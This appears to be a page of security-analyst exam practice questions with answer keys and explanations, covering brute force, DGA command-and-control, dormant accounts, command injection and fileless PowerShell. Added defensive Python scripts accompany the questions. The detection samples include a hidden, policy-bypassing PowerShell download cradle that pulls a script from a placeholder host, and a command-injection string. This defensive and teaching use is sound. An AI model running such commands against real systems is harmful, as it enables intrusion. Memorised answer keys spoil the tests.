Monitoring and correlating login attempts through SIEM solutions or log aggregation tools allows SOC analysts to detect patterns indicative of brute-force campaigns. Advanced analytics and anomaly detection can identify attempts from unusual geolocations or unusual timeframes. Rate limiting on authentication endpoints slows down attack attempts, reducing the effectiveness of automated scripts.
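The detection logic the two paragraphs above describe, as an added example that is not part of the original page: it parses constructed sshd-style failure lines and separates three patterns that need different responses, one source hammering an account (brute force), one source trying many accounts once each (password spraying, which per-account lockout misses), and one account hit from many sources (a distributed attempt). The sixty-second window, the thresholds, the log format and the addresses are all illustrative assumptions.

```python
"""Failed-logon triage from an authentication log (added example, not from the page)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed log format: "<iso-timestamp> sshd[pid]: Failed password for [invalid user] <user> from <src> port <n>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+")

WINDOW = timedelta(seconds=60)   # assumed sliding window
BRUTE_FORCE_MIN = 10             # failures from one source within WINDOW
SPRAY_MIN_USERS = 5              # distinct accounts from one source within WINDOW
DISTRIBUTED_MIN_SRCS = 5         # distinct sources against one account within WINDOW


def _line(ts, user, src, port, invalid=True):
    flag = "invalid user " if invalid else ""
    return f"{ts.isoformat()} sshd[4321]: Failed password for {flag}{user} from {src} port {port}"


def build_sample_log() -> str:
    """Constructed log: a brute force, a spray, a distributed attempt and two benign typos.
    198.51.100.0/24 and 203.0.113.0/24 are documentation ranges, not real attackers."""
    t0 = datetime(2024, 5, 1, 9, 0, 0)
    lines = []
    for i in range(12):   # brute force: one source, one account, every 5 s
        lines.append(_line(t0 + timedelta(seconds=5 * i), "admin", "198.51.100.7", 50000 + i))
    spray_users = ["root", "admin", "test", "guest", "oracle", "postgres", "ubuntu", "deploy"]
    for i, user in enumerate(spray_users):   # spray: one source, many accounts, once each
        lines.append(_line(t0 + timedelta(minutes=5, seconds=3 * i), user, "203.0.113.44", 41000 + i))
    for i in range(6):    # distributed: six sources against one real account
        lines.append(_line(t0 + timedelta(minutes=10, seconds=4 * i), "jsmith",
                           f"203.0.113.{i + 1}", 38000 + i, invalid=False))
    for i in range(2):    # benign: an internal user mistyping twice
        lines.append(_line(t0 + timedelta(minutes=15, seconds=20 * i), "alice", "10.0.0.12",
                           52000 + i, invalid=False))
    return "\n".join(lines)


def parse(log_text: str) -> list:
    """(timestamp, user, source) tuples, time-sorted; non-matching lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["user"], m["src"]))
    return sorted(events)


def sliding_peaks(events, key_fn, value_fn, window=WINDOW) -> dict:
    """key -> (most events in any window, most distinct values in any window)."""
    groups = defaultdict(list)
    for ev in events:
        groups[key_fn(ev)].append(ev)
    peaks = {}
    for key, evs in groups.items():
        win = deque()
        best_n = best_distinct = 0
        for ev in evs:                          # evs inherit the global time order
            win.append(ev)
            while ev[0] - win[0][0] > window:   # drop events that fell out of the window
                win.popleft()
            best_n = max(best_n, len(win))
            best_distinct = max(best_distinct, len({value_fn(e) for e in win}))
        peaks[key] = (best_n, best_distinct)
    return peaks


def detect(log_text: str) -> dict:
    events = parse(log_text)
    by_src = sliding_peaks(events, key_fn=lambda e: e[2], value_fn=lambda e: e[1])
    by_user = sliding_peaks(events, key_fn=lambda e: e[1], value_fn=lambda e: e[2])
    return {
        "brute_force": {src: n for src, (n, _) in by_src.items() if n >= BRUTE_FORCE_MIN},
        # spray = many accounts, few attempts each; a source doing both is reported as brute force
        "password_spray": {src: d for src, (n, d) in by_src.items()
                           if d >= SPRAY_MIN_USERS and n < BRUTE_FORCE_MIN},
        "distributed": {user: d for user, (_, d) in by_user.items() if d >= DISTRIBUTED_MIN_SRCS},
    }


if __name__ == "__main__":
    for kind, hits in detect(build_sample_log()).items():
        print(f"{kind:15} {hits}")
```

The per-account view (`distributed`) is the one a lockout-only policy never produces, and the spray detector intentionally keys on distinct usernames rather than attempt count, because each account sees only one failure.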

Additional preventive measures include ensuring strong password policies are enforced, training users on password hygiene, and conducting periodic audits to identify accounts with weak or default passwords. Threat intelligence feeds can provide information about known credential attack campaigns and attacker IP addresses, enabling proactive blocking and monitoring.

B Fileless malware using living-off-the-land techniques

Fileless malware operates in memory and leverages legitimate tools like PowerShell or WMI. While it may involve anomalous execution patterns, it does not produce repeated failed login attempts.

C Distributed denial-of-service (DDoS) attack

DDoS attacks focus on overwhelming resources to disrupt availability. They do not involve credential testing or systematic login attempts.

D Phishing attack delivering malicious attachments

Phishing attacks may deliver malware or steal credentials, but they typically rely on user interaction rather than automated login attempts across multiple endpoints.

Effective response includes isolating potentially affected accounts, monitoring authentication logs, enforcing MFA, and blocking suspicious IPs. Continuous monitoring and layered defense strategies minimize the risk of successful credential compromise.

Question 137

An analyst detects high volumes of DNS queries to pseudo-randomly generated domains, paired with outbound traffic to unknown IP addresses over non-standard ports. Which of the following BEST describes this activity?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Routine software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The described pattern—high-frequency DNS queries to pseudo-random domains combined with outbound connections over unusual ports—is a hallmark of malware utilizing a domain generation algorithm (DGA). DGAs allow malware to maintain resilient communication channels with its command-and-control (C2) infrastructure while evading static detection measures such as blacklists or signature-based detection.

DGAs work by algorithmically generating a large set of domain names over time, typically seeded by the date so that the malware and its operator compute the same list independently; the operator registers only a few of them, and the malware walks the list until one resolves. Because most candidates are never registered, infected hosts produce a large number of NXDOMAIN responses alongside the high-entropy names. DGAs are found in commodity botnets and ransomware families as well as in targeted intrusions; their value to any operator is long-term persistence of the C2 channel, since sinkholing or blocking a handful of domains does not break it.

Detecting DGA activity involves correlating DNS logs with network traffic. Indicators include high entropy in queried domain names, unusual query volumes, repeated failed resolutions, and connections to non-standard ports. Behavioral analysis and endpoint telemetry can identify malicious processes generating DGA activity in memory. Advanced detection may use machine learning models to identify high-entropy domain queries and anomalous traffic patterns.
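The indicators listed in this paragraph and in the detection paragraph of the earlier DGA question (entropy of the queried names, query volume, failed resolutions, distinct domains) can be scored per client from DNS logs alone. The following is an added example, not code from the original page: it runs over a constructed DNS log in an assumed "<timestamp> <client> <qname> <rcode>" layout. The thresholds are illustrative assumptions to be tuned against a real baseline, and the registrable-label extraction assumes single-label TLDs (a production version would consult the Public Suffix List).

```python
"""DGA triage over DNS logs (added example, not from the page)."""
import math
from collections import defaultdict

# Constructed sample: 10.0.0.5 behaves like a DGA-infected host, 10.0.0.9 is normal.
SAMPLE_DNS_LOG = """\
2024-05-01T10:00:01 10.0.0.5 xk3qz9vwm2lp.com NXDOMAIN
2024-05-01T10:00:02 10.0.0.5 qpr7t2nbz8ky.net NXDOMAIN
2024-05-01T10:00:03 10.0.0.5 w9zx4hj2lmqv.org NXDOMAIN
2024-05-01T10:00:04 10.0.0.5 lb8tq5zkx3rn.com NXDOMAIN
2024-05-01T10:00:05 10.0.0.5 mz2v9qx7pkwt.info NOERROR
2024-05-01T10:00:06 10.0.0.5 tkq4zxv8jm3w.com NXDOMAIN
2024-05-01T10:00:07 10.0.0.9 www.microsoft.com NOERROR
2024-05-01T10:00:08 10.0.0.9 update.microsoft.com NOERROR
2024-05-01T10:00:09 10.0.0.9 mail.google.com NOERROR
2024-05-01T10:00:10 10.0.0.9 github.com NOERROR
"""

# Assumed thresholds: establish your own baseline before alerting on them.
MIN_MEAN_ENTROPY = 3.0      # bits per character of the registrable label
MIN_NXDOMAIN_RATIO = 0.5    # share of queries that fail to resolve
MIN_DISTINCT_DOMAINS = 5    # distinct registrable labels queried


def shannon_entropy(text: str) -> float:
    """Shannon entropy in bits per character; 0.0 for empty or single-symbol input."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_label(qname: str) -> str:
    """Label left of the TLD, e.g. 'microsoft' for www.microsoft.com (single-label TLD assumed)."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def analyze(log_text: str) -> dict:
    """Per-client statistics plus a 'suspicious' verdict combining all three signals."""
    per_client = defaultdict(lambda: {"queries": 0, "nxdomain": 0, "entropies": [], "domains": set()})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue   # skip malformed lines instead of crashing the pipeline
        _ts, client, qname, rcode = parts
        label = registrable_label(qname)
        stats = per_client[client]
        stats["queries"] += 1
        if rcode == "NXDOMAIN":
            stats["nxdomain"] += 1
        stats["entropies"].append(shannon_entropy(label))
        stats["domains"].add(label)

    report = {}
    for client, s in per_client.items():
        mean_entropy = sum(s["entropies"]) / len(s["entropies"])
        nx_ratio = s["nxdomain"] / s["queries"]
        distinct = len(s["domains"])
        report[client] = {
            "queries": s["queries"],
            "mean_entropy": round(mean_entropy, 3),
            "nxdomain_ratio": round(nx_ratio, 3),
            "distinct_domains": distinct,
            # all three must hold: entropy alone also flags CDN and cloud hostnames
            "suspicious": (mean_entropy >= MIN_MEAN_ENTROPY
                           and nx_ratio >= MIN_NXDOMAIN_RATIO
                           and distinct >= MIN_DISTINCT_DOMAINS),
        }
    return report


def suspicious_clients(log_text: str) -> list:
    return sorted(c for c, r in analyze(log_text).items() if r["suspicious"])


if __name__ == "__main__":
    for client, r in analyze(SAMPLE_DNS_LOG).items():
        print(client, r)
```

Requiring all three signals together is deliberate: high-entropy labels on their own are common in legitimate CDN, telemetry and cloud hostnames, but those resolve, so the NXDOMAIN ratio is what separates a DGA walk from noisy-but-benign traffic.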

Mitigation involves isolating affected endpoints to prevent further compromise, blocking known malicious domains and IPs, and performing thorough malware eradication procedures. Reverse engineering the DGA algorithm allows analysts to predict future domain names and preemptively block them, disrupting C2 communication. Integration of threat intelligence feeds helps identify known DGA-based malware variants and associated indicators of compromise (IOCs).

Defense-in-depth is critical, combining endpoint detection and response (EDR), network monitoring, anomaly detection, strict egress filtering, and application whitelisting. Organizations should also implement user awareness training to prevent initial infection vectors such as phishing emails, which often deliver DGA-enabled malware.

B Routine software update traffic

Software updates communicate with known servers over standard ports and predictable domains. Randomized DNS queries and high-entropy domain names are inconsistent with normal update behavior.

C Distributed denial-of-service (DDoS) attack

DDoS attacks overwhelm systems to degrade service availability. They do not involve covert communication with randomly generated domains or external C2 servers.

D Misconfigured internal monitoring system

Misconfigurations can cause abnormal traffic but rarely result in high-frequency queries to pseudo-random domains combined with outbound connections over unusual ports.

Question 138

A security audit discovers several privileged service accounts that have not been used for over six months but still retain administrative privileges. Which of the following controls would MOST effectively reduce associated risks?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Dormant privileged accounts present a significant security risk. Attackers may exploit these accounts to gain unauthorized access or maintain persistence in the environment. Automated account deprovisioning is the most effective control because it systematically disables or removes accounts after a predefined period of inactivity. This ensures that administrative privileges are granted only when required, enforcing the principle of least privilege.

Automated deprovisioning integrated with identity governance and privileged access management (PAM) systems ensures consistent enforcement, auditability, and regulatory compliance (e.g., PCI DSS, HIPAA, SOX). Manual deprovisioning is error-prone, and dormant accounts may be overlooked, leaving potential attack vectors open.

Complementary controls include implementing multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and monitoring access attempts for anomalies. By removing or disabling inactive accounts, the organization significantly reduces the attack surface and prevents misuse of dormant credentials. Continuous monitoring of disabled accounts also provides early detection of potential insider threats or attempts to leverage compromised credentials.
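The policy this question and the earlier dormant-account question describe, as an added example that is not part of the original page: a review over a constructed account inventory (the kind of data a directory or PAM export provides) that disables privileged accounts unused for the inactivity period, ages never-used accounts from their creation date, exempts a named break-glass account for manual review, and then checks later authentication events against the disabled set, which is the monitoring the text recommends. The 180-day threshold, the field names, the account names and the exemption list are all illustrative assumptions.

```python
"""Dormant privileged account review (added example, not code from the page)."""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Optional

INACTIVE_DAYS = 180   # assumed policy threshold


@dataclass
class Account:
    name: str
    privileged: bool
    enabled: bool
    created: datetime
    last_logon: Optional[datetime]   # None means the account has never logged on


def _utc(s: str) -> datetime:
    return datetime.fromisoformat(s).replace(tzinfo=timezone.utc)


# Constructed inventory as seen on the review date below.
REVIEW_DATE = _utc("2024-06-01T00:00:00")
INVENTORY = [
    Account("svc_backup", True, True, _utc("2021-03-01T00:00:00"), _utc("2023-10-15T02:00:00")),
    Account("svc_deploy", True, True, _utc("2022-01-10T00:00:00"), _utc("2024-05-20T09:30:00")),
    Account("svc_legacy", True, True, _utc("2023-01-01T00:00:00"), None),
    Account("breakglass_admin", True, True, _utc("2020-01-01T00:00:00"), _utc("2023-01-01T00:00:00")),
    Account("svc_retired", True, False, _utc("2019-01-01T00:00:00"), _utc("2022-06-01T00:00:00")),
    Account("jdoe", False, True, _utc("2022-05-05T00:00:00"), _utc("2023-01-01T00:00:00")),
]
BREAK_GLASS = frozenset({"breakglass_admin"})   # exempt from automation, reviewed by hand


def classify(acct: Account, now: datetime, inactive_days: int = INACTIVE_DAYS,
             exempt: frozenset = BREAK_GLASS) -> str:
    """Return the action the policy takes for one account."""
    if not acct.privileged:
        return "out_of_scope"      # this review covers privileged accounts only
    if not acct.enabled:
        return "already_disabled"
    if acct.name in exempt:
        return "exempt_review"
    reference = acct.last_logon or acct.created   # never-used accounts age from creation
    if now - reference >= timedelta(days=inactive_days):
        return "disable"
    return "keep"


def apply_policy(accounts, now: datetime) -> dict:
    """Disable dormant privileged accounts in place; return name -> action taken."""
    actions = {}
    for acct in accounts:
        action = classify(acct, now)
        if action == "disable":
            acct.enabled = False   # in production: directory API call plus an audit record
        actions[acct.name] = action
    return actions


def logons_against_disabled(accounts, auth_events) -> list:
    """Disabled accounts that still receive authentication attempts. Someone is
    using a credential that should be dead: an early signal of compromise or insider misuse."""
    disabled = {a.name for a in accounts if not a.enabled}
    return sorted({user for user, _ts in auth_events if user in disabled})


if __name__ == "__main__":
    for name, action in apply_policy(INVENTORY, REVIEW_DATE).items():
        print(f"{name:18} {action}")
    # Constructed post-review authentication events: (username, timestamp)
    events = [("svc_backup", "2024-06-03T01:12:00"), ("svc_deploy", "2024-06-03T08:00:00")]
    print("attempts against disabled accounts:", logons_against_disabled(INVENTORY, events))
```

Treating a never-used privileged account as dormant from its creation date matters in practice: a service account provisioned for a project that never launched is exactly the kind of forgotten credential an attacker looks for, and a rule keyed only on last logon would keep it forever.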

B Increase password complexity requirements for service accounts

Strong passwords help resist brute-force attacks but do not mitigate the risk of dormant administrative accounts. The risk remains if the account is still active but unused.

C Disable all external SSH access

Restricting SSH access reduces exposure from external attacks but does not address internal threats or dormant accounts.

D Deploy full disk encryption on endpoints

Full disk encryption protects data at rest but does not prevent misuse of administrative accounts.


Question 139

During a penetration test, testers exploit unsanitized web input fields, allowing OS-level command execution. Which of the following controls BEST mitigates this type of vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection vulnerabilities occur when an application builds an operating system command from untrusted input and passes it to a shell, so shell metacharacters in the input (;, |, &&, backticks, $( )) become additional commands. Server-side input validation ensures that all input meets expected types, patterns, and lengths before it is used, and it must happen on the server because client-side checks are trivially bypassed. Parameterized commands keep the data separate from the executable part of the command: the program is invoked directly with an argument vector rather than through a shell string, so the input is only ever a single argument and is never parsed as syntax. Prepared statements apply the same separation to SQL.

Secure coding practices, including input validation, output encoding, and secure frameworks, reduce application-layer vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) identify injection vulnerabilities during development. Web application firewalls (WAFs) provide an additional layer of protection by blocking requests that match known attack signatures.

Monitoring and logging anomalous input attempts enable early detection. Remediation includes secure coding, code reviews, penetration testing, and developer training. While TLS encrypts communication, it does not prevent injection. Session timeouts protect sessions but do not mitigate injection. Firewalls control network traffic but cannot inspect application-level input. Server-side validation with parameterized commands remains the primary mitigation.
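The vulnerable pattern and its hardened form, for this question and the earlier command-injection question, as an added example that is not code from the original page. The feature is hypothetical: a diagnostics form that pings a host the user supplies. The vulnerable builder concatenates the field into a string that /bin/sh executes; the hardened version validates the field against an allowlist (IP literal or hostname, no leading hyphen so the value cannot be read as an option) and passes an argument vector with shell=False. The functions that invoke ping are included for completeness but the builders and validator are the part worth studying.

```python
"""OS command injection, vulnerable and hardened (added example, not from the page)."""
import ipaddress
import re
import subprocess


# ---- vulnerable: user input becomes part of a shell command line --------------------
def build_vulnerable_command(host: str) -> str:
    return "ping -c 1 " + host    # input "8.8.8.8; id" makes the shell run id as well


def run_vulnerable(host: str) -> subprocess.CompletedProcess:
    return subprocess.run(build_vulnerable_command(host), shell=True,
                          capture_output=True, text=True, timeout=10)


# ---- hardened: validate, then pass the value as one argv element --------------------
# Hostname: DNS labels of letters, digits and hyphens, 253 chars max, first char
# alphanumeric (so the value can never start with "-" and be parsed as an option).
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?"
    r"(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$", re.IGNORECASE)


def validate_host(value: str) -> str:
    """Return a canonical host or raise ValueError. Allowlist, not a blocklist."""
    value = value.strip()
    try:
        return str(ipaddress.ip_address(value))   # IPv4 or IPv6 literal
    except ValueError:
        pass
    if HOSTNAME_RE.match(value):
        return value.lower()
    raise ValueError(f"rejected host input: {value!r}")


def is_valid_host(value: str) -> bool:
    try:
        validate_host(value)
        return True
    except ValueError:
        return False


def build_safe_command(host: str) -> list:
    return ["ping", "-c", "1", validate_host(host)]


def run_safe(host: str) -> subprocess.CompletedProcess:
    # A list with shell=False (the default): no shell ever sees the input, so
    # metacharacters are just bytes in one argument.
    return subprocess.run(build_safe_command(host), capture_output=True,
                          text=True, timeout=10)


if __name__ == "__main__":
    payload = "8.8.8.8; id"
    print("shell would run :", build_vulnerable_command(payload))
    try:
        build_safe_command(payload)
    except ValueError as exc:
        print("hardened rejects:", exc)
    print("argv for good in:", build_safe_command("example.com"))
```

Two points the hardened version makes that a regex filter on its own does not: the argument vector removes the shell from the picture entirely, so even an input the validator wrongly accepts cannot chain a second command, and the validator still exists because argument injection (a value beginning with "-") is a separate problem that shell=False does not solve.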

Question 140

A SOC analyst observes obfuscated PowerShell scripts executing on endpoints and communicating with unknown external IPs. Antivirus scans detect no malicious files. Which of the following BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory, leveraging legitimate system tools such as PowerShell, WMI, or Office macros. Obfuscated scripts communicating externally without generating files on disk indicate living-off-the-land (LotL) techniques. These attacks evade traditional signature-based antivirus because there is no file to scan; the malicious logic exists only as a process image and a command line.

Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include unusual script execution, outbound connections to unknown IPs, and deviations from baseline system behavior. Mitigation involves isolating endpoints, terminating malicious processes, analyzing scripts, and performing system remediation.

Preventive controls include enforcing least privilege, PowerShell module and script block logging, application whitelisting, Constrained Language Mode, and integration with threat intelligence to block malicious domains. Execution policy is not a security boundary and is bypassed with a single switch, so it should not be relied on against an attacker. Defense-in-depth strategies combining anomaly detection, monitoring, and user awareness are critical to detecting and remediating fileless malware.

B Standard ransomware encrypting files

Ransomware leaves file-level artifacts (encrypted files, ransom notes, dropped binaries) that antivirus and file monitoring would surface; the observed activity is memory-resident and script-driven with no malicious files found.

C Phishing emails delivering malicious attachments

Phishing may have been the initial delivery vector, but it describes how the attacker got in, not the obfuscated in-memory PowerShell execution and outbound C2 traffic actually observed.

D Distributed denial-of-service (DDoS) attack

DDoS targets availability and does not involve obfuscated scripts on endpoints communicating with external IPs.
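The script block logging this question and the earlier fileless-malware question recommend only helps if something reads the records. The following is an added example, not code from the original page: a triage pass over constructed records resembling what Script Block Logging (Event ID 4104) and process-creation auditing produce. It decodes -EncodedCommand payloads (PowerShell encodes them as base64 over UTF-16LE) and scans both the raw and decoded text for the download-cradle and obfuscation tricks the text describes. The indicator patterns, weights, alert threshold, hostnames and the 203.0.113.10 address (a documentation-range address) are illustrative assumptions.

```python
"""Triage of PowerShell script block / command-line records (added example, not from the page)."""
import base64
import re

# Weighted indicators of obfuscation and in-memory execution. Weights are assumed.
INDICATORS = {
    "encoded_command":    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I), 3),
    "hidden_window":      (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    "policy_bypass":      (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), 2),
    "download_cradle":    (re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I), 3),
    "invoke_expression":  (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 3),
    "in_memory_load":     (re.compile(r"\[Reflection\.Assembly\]::Load|FromBase64String", re.I), 3),
    # -join, [char]NN, backtick-split tokens (I`E`X) and single-character string concatenation ('I'+'E')
    "string_obfuscation": (re.compile(r"-join\b|\[char\]\s*\d+|`[A-Za-z]|['\"][A-Za-z]['\"]\s*\+\s*['\"]", re.I), 2),
}
ALERT_THRESHOLD = 5   # assumed


def encode_ps(command: str) -> str:
    """Encode the way PowerShell expects -EncodedCommand: base64 over UTF-16LE."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(text: str):
    """The decoded -EncodedCommand payload, or None if absent or not decodable."""
    m = INDICATORS["encoded_command"][0].search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_script_block(text: str) -> dict:
    """Score one record; the decoded payload is scanned as a second layer."""
    decoded = decode_encoded_command(text)
    hits = set()
    for layer in (text, decoded or ""):
        for name, (pattern, _weight) in INDICATORS.items():
            if pattern.search(layer):
                hits.add(name)
    score = sum(INDICATORS[h][1] for h in hits)
    return {"score": score, "indicators": sorted(hits), "decoded": decoded,
            "alert": score >= ALERT_THRESHOLD}


# Constructed records: one benign admin command, one classic cradle, one split-string variant.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS-014",
     "text": "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB } | Sort-Object Length"},
    {"id": 2, "host": "WS-014",
     "text": "powershell.exe -nop -w hidden -ep bypass -enc " + encode_ps(CRADLE)},
    {"id": 3, "host": "WS-022",
     "text": "$a='I'+'E'+'X'; & $a ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b)))"},
]


def triage(events) -> list:
    """(id, host, score, indicators) for records over the threshold, highest score first."""
    out = []
    for ev in events:
        r = analyze_script_block(ev["text"])
        if r["alert"]:
            out.append((ev["id"], ev["host"], r["score"], r["indicators"]))
    return sorted(out, key=lambda t: -t[2])


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["id"], analyze_script_block(ev["text"]))
    print("alerts:", triage(SAMPLE_EVENTS))
```

The third record is why the decoded layer and the string-concatenation pattern are both needed: IEX never appears literally, so a plain keyword match on "IEX" would miss it, while the FromBase64String and character-splitting indicators still catch it. On a real host, feed the script block text (the `ScriptBlockText` field of the 4104 records) and the process command line from your EDR or Sysmon into `analyze_script_block` instead of the constructed list.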
